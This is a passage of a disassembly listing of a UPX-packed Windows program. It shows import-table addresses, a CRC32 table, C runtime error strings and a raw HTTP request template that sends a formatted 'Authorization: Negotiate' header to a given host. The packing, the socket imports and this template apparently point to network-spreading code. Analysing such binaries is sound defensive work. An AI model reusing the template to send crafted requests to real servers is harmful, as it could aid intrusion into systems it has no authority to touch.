T I N E ======================================= sub_426DD8 proc near ; DATA XREF: UPX0:00427F74o ; FUNCTION CHUNK AT 0040D4A9 SIZE 00000008 BYTES lea ecx, [ebp-38h] jmp loc_40D4A9 sub_426DD8 endp ; --------------------------------------------------------------------------- mov eax, [ebp-20h] and eax, 1 test eax, eax jz locret_426DF6 mov ecx, [ebp+8] jmp loc_40D4A9 ; --------------------------------------------------------------------------- locret_426DF6: ; CODE XREF: UPX0:00426DE8j retn ; --------------------------------------------------------------------------- loc_426DF7: ; DATA XREF: sub_40D07Do mov eax, offset dword_427F48 jmp loc_41C91F ; --------------------------------------------------------------------------- align 4 lea ecx, [ebp+14h] jmp loc_40D4A9 ; --------------------------------------------------------------------------- loc_426E0C: ; DATA XREF: UPX0:00427FA4o lea ecx, [ebp-1Ch] jmp loc_40D4A9 ; --------------------------------------------------------------------------- loc_426E14: ; DATA XREF: sub_40D21Fo mov eax, offset dword_427F78 jmp loc_41C91F ; --------------------------------------------------------------------------- align 10h loc_426E20: ; DATA XREF: sub_40D78Co mov eax, offset dword_427FA8 jmp loc_41C91F ; --------------------------------------------------------------------------- mov ecx, [ebp-14h] jmp sub_4268B6 ; --------------------------------------------------------------------------- loc_426E32: ; DATA XREF: sub_4264FEo mov eax, offset dword_428008 jmp loc_41C91F ; --------------------------------------------------------------------------- lea ecx, [ebp-20h] jmp loc_40D4A9 ; --------------------------------------------------------------------------- loc_426E44: ; DATA XREF: sub_426573o mov eax, offset dword_4280A0 jmp loc_41C91F ; --------------------------------------------------------------------------- mov ecx, [ebp-14h] jmp sub_4268B6 ; --------------------------------------------------------------------------- loc_426E56: ; DATA XREF: sub_4265D0o mov eax, offset dword_4280C4 jmp loc_41C91F ; --------------------------------------------------------------------------- mov ecx, [ebp-10h] jmp sub_4268B6 ; --------------------------------------------------------------------------- loc_426E68: ; DATA XREF: sub_426618o mov eax, offset dword_4280E8 jmp loc_41C91F ; --------------------------------------------------------------------------- lea ecx, [ebp-20h] jmp loc_40D4A9 ; --------------------------------------------------------------------------- loc_426E7A: ; DATA XREF: sub_42669Ao mov eax, offset dword_428148 jmp loc_41C91F ; --------------------------------------------------------------------------- dd 5Fh dup(0) dword_427000 dd 77E75D9Eh ; DATA XREF: sub_40F96B+201r ; sub_416DC9+26r dword_427004 dd 77E6BD68h ; DATA XREF: sub_4261AB+173r dword_427008 dd 77E77F2Eh ; DATA XREF: sub_425F03+3Er ; sub_425F03+261r dword_42700C dd 77E762D0h ; DATA XREF: sub_425F03+5Br ; sub_425F03+B9r dword_427010 dd 77E70192h ; DATA XREF: sub_424F0A+F9r dword_427014 dd 77E7176Ch ; DATA XREF: sub_4247A8+8r dword_427018 dd 77E7339Ch ; DATA XREF: sub_424770+Cr dword_42701C dd 77E7C9E7h ; DATA XREF: sub_424752+5r ; sub_424763+6r dword_427020 dd 77E7C866h ; DATA XREF: sub_423CEC+3Fr ; sub_423CEC+12Dr ... dword_427024 dd 77E641EBh ; DATA XREF: sub_423CEC+59r ; sub_423CEC+8Dr ... dword_427028 dd 77E73FF9h ; DATA XREF: sub_4238DF+2Cr dword_42702C dd 77E7FF2Eh ; DATA XREF: sub_4237B1:loc_423801r ; sub_423828:loc_42387Br dword_427030 dd 77E78406h ; DATA XREF: sub_423302+FFr ; sub_423302+166r ... dword_427034 dd 77E79C3Dh ; DATA XREF: sub_423302+158r ; sub_4235C9+143r dword_427038 dd 77E7C931h ; DATA XREF: sub_423302+19Dr dword_42703C dd 77E77EE1h ; DATA XREF: sub_4231D0+9r dword_427040 dd 77E67702h ; DATA XREF: sub_4231D0:loc_4231FFr ; sub_4231D0+E1r dword_427044 dd 77E7C9E1h ; DATA XREF: sub_4231D0+CEr dword_427048 dd 77E9C5B1h ; DATA XREF: sub_4231D0+11Fr dword_42704C dd 77EB9A84h ; DATA XREF: sub_422CEE+138r dword_427050 dd 77E781F9h ; DATA XREF: sub_422ACA+42r ; sub_422ACA+14Dr ... dword_427054 dd 77E77405h ; DATA XREF: sub_422ACA+5Er ; sub_422ACA+A7r ... dword_427058 dd 77F522F2h ; DATA XREF: sub_422608+58r dword_42705C dd 77E6D706h ; DATA XREF: sub_4210AC+215r ; sub_4268D9+2Er dword_427060 dd 77E6C703h ; DATA XREF: sub_420042+1Ar dword_427064 dd 77E75CB5h ; DATA XREF: sub_40111D+DFr ; sub_401221+7Ar ... dword_427068 dd 77E77963h ; DATA XREF: sub_40111D+B8r ; sub_401221+2DBr ... dword_42706C dd 77E61BB8h ; DATA XREF: sub_40111D+A7r ; sub_401221+2C3r ... dword_427070 dd 77E7A099h ; DATA XREF: sub_40111D+83r ; sub_401221+DAr ... dword_427074 dd 77E704FCh ; DATA XREF: sub_40111D+74r ; sub_401221+C4r ... dword_427078 dd 77E61BE6h ; DATA XREF: sub_40111D+29r ; sub_401221+1F4r ... dword_42707C dd 77E7AC37h ; DATA XREF: sub_401221+3C1r ; sub_401ACD+7BBr ... dword_427080 dd 77E73628h ; DATA XREF: sub_401221+33Br ; sub_401ACD+7872r ... dword_427084 dd 77E706B7h ; DATA XREF: sub_401221+274r ; sub_417276+15r ... dword_427088 dd 77E80656h ; DATA XREF: sub_401221+267r dword_42708C dd 77F5157Dh ; DATA XREF: sub_401221+1D8r ; sub_401221+3E6r ... dword_427090 dd 77E6BD13h ; DATA XREF: sub_401221:loc_4013DCr dword_427094 dd 77E70396h ; DATA XREF: sub_401221+1B5r ; sub_401221+221r ... dword_427098 dd 77E74CABh ; DATA XREF: sub_401221+19Er ; sub_40F6B4+110r ... dword_42709C dd 77E79F93h ; DATA XREF: sub_401221+D3r ; sub_409B13+2r ... dword_4270A0 dd 77E79D5Bh ; DATA XREF: sub_401221+6Br ; sub_401221+311r ... dword_4270A4 dd 77E7C2C4h ; DATA XREF: sub_401221+64r dword_4270A8 dd 77E7751Ah ; DATA XREF: sub_401221+2Cr ; sub_401ACD+2561r ... dword_4270AC dd 77E75CEBh ; DATA XREF: sub_401ACD+7AD8r ; sub_40B232+2Br ... dword_4270B0 dd 77E6AD34h ; DATA XREF: sub_401ACD+69ACr ; sub_41835A+35r dword_4270B4 dd 77E71AFEh ; DATA XREF: sub_401ACD+6776r dword_4270B8 dd 77E805D8h ; DATA XREF: sub_409B13+13Ar ; sub_409B13:loc_40A021r ... dword_4270BC dd 77E7A5FDh ; DATA XREF: sub_409B13+11r ; sub_416F1B+60r ... dword_4270C0 dd 77E65F4Ch ; DATA XREF: UPX0:0040ADF7r ; sub_419594+34r dword_4270C4 dd 77E7513Ch ; DATA XREF: UPX0:0040AE8Er dword_4270C8 dd 77E7C657h ; DATA XREF: UPX0:0040AF02r ; sub_4184E2+32r ... dword_4270CC dd 77E73C49h ; DATA XREF: sub_40B162+4Ar ; sub_40B8A2+1AFr ... dword_4270D0 dd 77F7E300h ; DATA XREF: sub_40C125+142r dword_4270D4 dd 77F7E21Fh ; DATA XREF: sub_40C125+D7r dword_4270D8 dd 77E7C706h ; DATA XREF: sub_40C33D+77r dword_4270DC dd 77F53275h ; DATA XREF: sub_40C33D+6Br ; sub_40C33D+22Fr dword_4270E0 dd 77E79D8Ch ; DATA XREF: sub_40D8AE+94r ; sub_40D99C+181r ... dword_4270E4 dd 77E737DEh ; DATA XREF: sub_40D99C+43Ar dword_4270E8 dd 77E78B82h ; DATA XREF: sub_40D99C+1A9r ; sub_40D99C+499r ... dword_4270EC dd 77E7A837h ; DATA XREF: sub_40D99C+A7r ; sub_40F6B4+1CBr ... dword_4270F0 dd 77E616B4h ; DATA XREF: sub_40E504+19Br ; sub_410CD6+115r ... dword_4270F4 dd 77E79CE3h ; DATA XREF: sub_40E504+111r ; sub_410F20+77r ... dword_4270F8 dd 77E79C90h ; DATA XREF: sub_40E504+FDr ; sub_40E504+10Ar ... dword_4270FC dd 77E7727Ah ; DATA XREF: sub_40E504+74r ; sub_410E27+23r ... dword_427100 dd 77E64106h ; DATA XREF: sub_40F531+A0r ; sub_41AA43+1B6r dword_427104 dd 77E64006h ; DATA XREF: sub_40F531+8Cr ; sub_41AA43+19Fr dword_427108 dd 77E793EFh ; DATA XREF: sub_40F6B4+1F5r ; sub_40FFF1+38r ... dword_42710C dd 77E78EAAh ; DATA XREF: sub_40F96B+5ECr ; sub_416DC9+C0r ... dword_427110 dd 77E79424h ; DATA XREF: sub_40F96B+280r ; sub_417276+135r dword_427114 dd 77E794BFh ; DATA XREF: sub_40F96B+272r ; sub_417276+123r dword_427118 dd 77E75E67h ; DATA XREF: sub_40F96B+212r ; sub_40F96B+5DBr ... dword_42711C dd 77E78C81h ; DATA XREF: sub_40FFF1+6Cr ; sub_415E1B+259r ... dword_427120 dd 77E76968h ; DATA XREF: sub_410A4E+5Fr dword_427124 dd 77E74C59h ; DATA XREF: sub_410CD6+C7r dword_427128 dd 77EC7C51h ; DATA XREF: sub_4110AB+5Er dword_42712C dd 77E70F89h ; DATA XREF: sub_411C14+Er ; sub_4151AD+Dr ... dword_427130 dd 77E802FCh ; DATA XREF: sub_412B09+18Cr ; sub_412B09+2D4r ... dword_427134 dd 77E6D75Bh ; DATA XREF: sub_412B09+182r ; sub_41386C+FFr dword_427138 dd 77E80618h ; DATA XREF: sub_416F1B+170r ; sub_4185A5+D4r dword_42713C dd 77E78147h ; DATA XREF: sub_416F1B+BCr dword_427140 dd 77F51597h ; DATA XREF: sub_4170ED+41r ; sub_4170ED+F5r ... dword_427144 dd 77F516F8h ; DATA XREF: sub_4170ED+21r ; sub_417276+4Ar ... dword_427148 dd 77E77CB7h ; DATA XREF: sub_4170ED+10r ; sub_417276+40r ... dword_42714C dd 77E7F01Ah ; DATA XREF: sub_417276+88r ; sub_41741D+55r dword_427150 dd 77E61A54h ; DATA XREF: sub_417276+56r ; sub_41741D+97r dword_427154 dd 77E7C3A5h ; DATA XREF: sub_417276+34r ; sub_41741D+2Er dword_427158 dd 77E76A60h ; DATA XREF: sub_41814D+2Dr dword_42715C dd 77E71B14h ; DATA XREF: sub_4181D7+26r dword_427160 dd 77E7166Fh ; DATA XREF: sub_4181D7+1Dr dword_427164 dd 77E75090h ; DATA XREF: sub_418212+69r dword_427168 dd 77E74D76h ; DATA XREF: sub_418212+36r dword_42716C dd 77E77797h ; DATA XREF: sub_418212+25r dword_427170 dd 77E7011Ah ; DATA XREF: sub_418294+96r dword_427174 dd 77E73CE2h ; DATA XREF: sub_418294+60r dword_427178 dd 77E668D9h ; DATA XREF: sub_41835A+15Dr dword_42717C dd 77E79924h ; DATA XREF: sub_418B59+13r ; sub_422ACA+20Dr ... dword_427180 dd 77E77CCEh ; DATA XREF: sub_418C2B+Fr ; sub_41D834+54r ... dword_427184 dd 77E76A2Eh ; DATA XREF: sub_4196BD+DEr dword_427188 dd 77E7FF65h ; DATA XREF: sub_419B10+5Ar dword_42718C dd 77EB7624h ; DATA XREF: sub_419B10+3Dr dword_427190 dd 77E6C29Dh ; DATA XREF: sub_41A19E+1EBr dword_427194 dd 77E76C1Ah ; DATA XREF: sub_41AA43+1CFr dword_427198 dd 77F5722Fh ; DATA XREF: sub_41B202+110r ; sub_41B202+22Dr ... dword_42719C dd 77F6183Eh ; DATA XREF: sub_42675Cr dword_4271A0 dd 77E76E3Dh ; DATA XREF: sub_41D081+6Cr ; sub_4247EC+38r dword_4271A4 dd 77E61608h ; DATA XREF: sub_41D081+17r dword_4271A8 dd 77E6177Ah ; DATA XREF: UPX0:0041D9D2r ; sub_423302+59r dword_4271AC dd 77E7C938h ; DATA XREF: UPX0:0041D9A7r dword_4271B0 dd 77E7C486h ; DATA XREF: UPX0:0041D959r dword_4271B4 dd 77E7AC5Eh ; DATA XREF: sub_41DC8A+54r dword_4271B8 dd 77E76E0Bh ; DATA XREF: sub_41DDD2+50r dword_4271BC dd 77E7C726h ; DATA XREF: sub_41DDD2+11r dword_4271C0 dd 77E79E34h ; DATA XREF: sub_41DEA2+240r ; sub_41E976+120r ... dword_4271C4 dd 77E7980Ah ; DATA XREF: sub_41E4D4+76r ; sub_41E585+51r ... dword_4271C8 dd 77E73196h ; DATA XREF: sub_42478C+Cr dword_4271CC dd 77E7849Fh ; DATA XREF: sub_41FEA9+48r ; sub_4200E8+14r ... dword_4271D0 dd 77E7A13Fh ; DATA XREF: sub_420042+2Fr align 8 dword_4271D8 dd 71B2ACCBh ; DATA XREF: sub_426750r align 10h dword_4271E0 dd 71AB4122h ; DATA XREF: sub_414B46+D4r dword_4271E4 dd 71AB1746h ; DATA XREF: sub_412661+1DEr dword_4271E8 dd 71AB401Ch ; DATA XREF: sub_412661+21Br ; sub_412661+243r dword_4271EC dd 71AB1836h ; DATA XREF: sub_40EFBF+6Er ; sub_40F03C+8Er dword_4271F0 dd 71AB41DAh ; DATA XREF: sub_40E992+4Ar ; sub_40EFBF+15r dword_4271F4 dd 71AB3F8Dh ; DATA XREF: sub_40E992+5Ar dword_4271F8 dd 71AB155Ah ; DATA XREF: sub_40E992+8Dr ; sub_4136C6+70r ... dword_4271FC dd 71AB3ECEh ; DATA XREF: sub_40E992+B5r dword_427200 dd 71AB5DE2h ; DATA XREF: sub_40E992+C9r dword_427204 dd 71AB868Dh ; DATA XREF: sub_40E992+171r dword_427208 dd 71AB5A01h ; DATA XREF: sub_414C2F+20r dword_42720C dd 71AB12F8h ; DATA XREF: sub_40DEA1+27r ; sub_40DFE3+27r ... dword_427210 dd 71AB1746h ; DATA XREF: sub_40DEA1+36r ; sub_40DFE3+36r ... dword_427214 dd 71AB3E5Dh ; DATA XREF: sub_40DEA1+59r ; sub_40DFE3+59r ... dword_427218 dd 71AB5690h ; DATA XREF: sub_40DEA1+6Ar ; sub_40DFE3+6Ar ... dword_42721C dd 71AB1A6Dh ; DATA XREF: sub_40DEA1+E0r ; sub_40DFE3+E0r ... dword_427220 dd 71AB3C22h ; DATA XREF: UPX0:0040D389r ; sub_40DEA1+45r ... dword_427224 dd 71AB1AF4h ; DATA XREF: sub_40CFDF+12r ; sub_40DEA1+C3r ... dword_427228 dd 71AB1890h ; DATA XREF: sub_40CE41+4Cr ; sub_40E992+106r dword_42722C dd 71AB1B7Bh ; DATA XREF: sub_426756r dword_427230 dd 71AB157Eh ; DATA XREF: sub_401ACD+2FA9r align 8 dword_427238 dd 0 ; DATA XREF: sub_401070+26r dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh dword_427638 dd 2Eh ; DATA XREF: sub_401ACD+347Do ; sub_401ACD+356Do ... dword_42763C dd 2Eh ; DATA XREF: sub_401ACD+389Do ; sub_401ACD+38D3o ... aGetHttp1_0Host db 'GET / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_40D21F+62o db 'Host: %s',0Dh,0Ah db 'Authorization: Negotiate %s',0Dh,0Ah db 0Dh,0Ah,0 align 10h dbl_427680 dq 1.388888888888889e-2 ; DATA XREF: sub_40D031+2Fr dbl_427688 dq 1.666666666666667e-1 ; DATA XREF: sub_40D031+15r dword_427690 dd 0FFFFFFFFh ; DATA XREF: sub_40D07D+16Fr ; sub_40D4B1r ... align 8 dbl_427698 dq 1.333333333333333 ; DATA XREF: sub_40D07D+79r dword_4276A0 dd 0 ; DATA XREF: sub_40D21F+4Do ; sub_40D561+5Bo ... flt_4276A4 dd 5.0e-1 ; DATA XREF: sub_40D99C+398r dbl_4276A8 dq 9.765625e-4 ; DATA XREF: sub_4163FA+2BDr ; sub_4163FA+2D8r ... dbl_4276B0 dq -1.52587890625e-4 ; DATA XREF: sub_417ADE+3E5r dbl_4276B8 dq 3.0517578125e-4 ; DATA XREF: sub_417ADE+3C5r dbl_4276C0 dq -3.0517578125e-4 ; DATA XREF: sub_417ADE+342r ; sub_417ADE+3A7r dbl_4276C8 dq 1.52587890625e-4 ; DATA XREF: sub_417ADE+271r dbl_4276D0 dq -1.739501953125e-3 ; DATA XREF: sub_417ADE+24Br ; sub_417ADE+2D5r ... dbl_4276D8 dq 3.11279296875e-3 ; DATA XREF: sub_417ADE+E1r dbl_4276E0 dq 3.0517578125e-5 ; DATA XREF: sub_417ADE+AEr ; sub_417ADE+138r ... dbl_4276E8 dq 6.103515625e-5 ; DATA XREF: sub_417ADE+93r ; sub_417ADE+308r dbl_4276F0 dq 2.288818359375e-3 ; DATA XREF: sub_417ADE+21r dbl_4276F8 dq -3.0517578125e-5 ; DATA XREF: sub_418685+2Br flt_427700 dd 9.765625e-4 ; DATA XREF: sub_41A4D2+1B0r flt_427704 dd 8.0 ; DATA XREF: sub_41A4D2+1AAr flt_427708 dd 0.0 ; DATA XREF: sub_41A4D2+171r flt_42770C dd 1.0e-3 ; DATA XREF: sub_41A4D2+168r dbl_427710 dq 1.0 ; DATA XREF: sub_41C679+6Cr ; sub_41C7BF+6Cr ... dword_427718 dd 0FFFFFFFFh, 41DA0Ah, 41DA1Eh ; DATA XREF: UPX0:0041D938o a__global_heap_ db '__GLOBAL_HEAP_SELECTED',0 ; DATA XREF: sub_41DC8A+8Eo align 4 a__msvcrt_heap_ db '__MSVCRT_HEAP_SELECT',0 ; DATA XREF: sub_41DC8A+4Fo align 4 byte_427754 db 6 ; DATA XREF: sub_41F69F:loc_41F6F6r db 2 dup(0), 6 dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h dd 0 dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h dd 8000008h, 7000800h, 8 aNull: ; DATA XREF: UPX0:off_43CBF4o unicode 0, <(null)>,0 align 10h aNull_0 db '(null)',0 ; DATA XREF: UPX0:off_43CBF0o align 4 a_yn db '_yn',0 a_y1 db '_y1',0 a_y0 db '_y0',0 aFrexp db 'frexp',0 align 4 aFmod db 'fmod',0 align 4 a_hypot db '_hypot',0 align 4 a_cabs db '_cabs',0 align 4 aLdexp db 'ldexp',0 align 4 aModf db 'modf',0 align 4 aFabs db 'fabs',0 align 4 aFloor db 'floor',0 align 4 aCeil db 'ceil',0 align 4 aTan db 'tan',0 aCos db 'cos',0 aSin db 'sin',0 aSqrt db 'sqrt',0 align 10h aAtan2 db 'atan2',0 align 4 aAtan db 'atan',0 align 10h aAcos db 'acos',0 align 4 aAsin db 'asin',0 align 10h aTanh db 'tanh',0 align 4 aCosh db 'cosh',0 align 10h aSinh db 'sinh',0 align 4 aLog10 db 'log10',0 align 10h aPow db 'pow',0 aExp db 'exp',0 ; DATA XREF: UPX0:off_43CE6Co dbl_427878 dq 0.0 ; DATA XREF: sub_42135F+8Cr ; sub_42135F+ACr ... dbl_427880 dq 4.195835e6 ; DATA XREF: sub_421874+Fr dbl_427888 dq 3.145727e6 ; DATA XREF: sub_421874+6r aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_4218B2+Fo align 4 aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_4218B2o align 4 aE000 db 'e+000',0 ; DATA XREF: sub_4219D9+93o align 10h dword_4278C0 dd 0FFFFFFFFh, 4220C4h, 4220CEh, 0 ; DATA XREF: sub_42205D+5o dword_4278D0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_42218C+5o dd offset loc_42224A align 10h dd offset sub_422228 dd offset sub_422232 dword_4278E8 dd 0FFFFFFFFh, 42247Ah, 42247Eh, 0 ; DATA XREF: sub_4222C2+5o dword_4278F8 dd 0FFFFFFFFh, 4224DCh, 4224E5h, 0 ; DATA XREF: sub_422486+5o dword_427908 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_42255C+5o dd offset loc_4225AD align 8 dd offset loc_422599 dd offset loc_42259D dword_427920 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4225B2+5o dd offset loc_422603 align 10h dd offset loc_4225EF dd offset loc_4225F3 dword_427938 dd 2 dup(0) ; DATA XREF: sub_422ACA+36o ; sub_423CEC+39o ... dword_427940 dd 0FFFFFFFFh, 422BDAh, 422BDEh, 0FFFFFFFFh, 422C8Eh, 422C92h ; DATA XREF: sub_422ACA+5o dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0 dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h dd 65682065h, 0A0D7061h, 0 aR6027NotEnough db 'R6027',0Dh,0Ah db '- not enough space for lowio initialization',0Dh,0Ah,0 align 4 aR6026NotEnough db 'R6026',0Dh,0Ah db '- not enough space for stdio initialization',0Dh,0Ah,0 align 10h aR6025PureVirtu db 'R6025',0Dh,0Ah db '- pure virtual function call',0Dh,0Ah,0 align 4 aR6024NotEnough db 'R6024',0Dh,0Ah db '- not enough space for _onexit/atexit table',0Dh,0Ah,0 align 10h aR6019UnableToO db 'R6019',0Dh,0Ah db '- unable to open console device',0Dh,0Ah,0 align 4 aR6018Unexpecte db 'R6018',0Dh,0Ah db '- unexpected heap error',0Dh,0Ah,0 align 10h aR6017Unexpecte db 'R6017',0Dh,0Ah db '- unexpected multithread lock error',0Dh,0Ah,0 align 10h aR6016NotEnough db 'R6016',0Dh,0Ah db '- not enough space for thread data',0Dh,0Ah,0 aAbnormalProgra db 0Dh,0Ah db 'abnormal program termination',0Dh,0Ah,0 align 10h aR6009NotEnough db 'R6009',0Dh,0Ah db '- not enough space for environment',0Dh,0Ah,0 aR6008NotEnough db 'R6008',0Dh,0Ah db '- not enough space for arguments',0Dh,0Ah,0 align 4 aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: UPX0:off_43D03Co db '- floating point not loaded',0Dh,0Ah,0 align 10h aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_4235C9+119o align 4 asc_427C08 db 0Ah ; DATA XREF: sub_4235C9+F1o db 0Ah,0 align 4 aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_4235C9+D3o db 0Ah db 'Program: ',0 align 4 a___ db '...',0 ; DATA XREF: sub_4235C9+BFo aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_4235C9+7Do align 8 dword_427C48 dd 0FFFFFFFFh, 423DE5h, 423DE9h ; DATA XREF: sub_423CEC+5o aSunmontuewedth db 'SunMonTueWedThuFriSat',0 align 4 aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0 align 4 aTz db 'TZ',0 ; DATA XREF: sub_4247EC+Ao align 4 aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_424D78+3Do align 4 aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_424D78+35o aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_424D78+24o a1Qnan db '1#QNAN',0 ; DATA XREF: sub_4256C2:loc_4257B7o align 10h a1Inf db '1#INF',0 ; DATA XREF: sub_4256C2+D8o align 4 a1Ind db '1#IND',0 ; DATA XREF: sub_4256C2+C7o align 10h a1Snan db '1#SNAN',0 ; DATA XREF: sub_4256C2+ADo align 4 dword_427CE8 dd 0FFFFFFFFh, 4260BAh, 4260BEh, 0FFFFFFFFh, 426129h, 42612Dh ; DATA XREF: sub_425F03+5o dd 427E24h off_427D04 dd offset loc_4264E2 ; DATA XREF: sub_4264BA+8o ; sub_4264FE+2Co ... dd offset sub_4264D5 dd offset sub_4266F6 dd offset dword_427E70 off_427D14 dd offset sub_42654C ; DATA XREF: sub_4264FE+3Ao ; sub_426568o ... dd offset sub_4264D5 dd offset loc_426732 dword_427D20 dd 0 ; DATA XREF: sub_4264FE+16o ; sub_4265D0+16o aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_426573+11o dd offset dword_427EBC off_427D40 dd offset sub_42665B ; DATA XREF: sub_426677o ; sub_42669A+37o ... dd offset sub_4264D5 dd offset loc_426714 aStringTooLong db 'string too long',0 ; DATA XREF: sub_42669A+11o dd offset dword_427F00 off_427D60 dd offset loc_4267F7 ; DATA XREF: sub_4267E2o ; UPX0:off_43D764o ... dd offset dword_427F30 off_427D68 dd offset loc_426813 ; DATA XREF: sub_42682F+8o ; sub_42686C+8o ... dd offset sub_4268CC aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_4268CC+7o align 8 dword_427D88 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: sub_4268D9+Eo dd 3, 19930520h, 2 dup(0) dword_427DA8 dd 0FFFFFFFFh, 426A8Ah, 426A8Eh, 0FFFFFFFFh, 426B07h, 426B0Bh ; DATA XREF: sub_426988+5o dword_427DC0 dd 0FFFFFFFFh, 426CFFh, 426D03h, 0FFFFFFFFh, 426D5Ch, 426D60h ; DATA XREF: sub_426C13+5o dd 43D764h, 2 dup(0) dd 0FFFFFFFFh, 2 dup(0) off_427DF0 dd offset off_43D77C ; DATA XREF: UPX0:00427E08o ; UPX0:00427E54o ... dd 1, 0 dd 0FFFFFFFFh, 2 dup(0) dd offset off_427DF0 dd offset dword_427DC0+18h dword_427E10 dd 3 dup(0) ; 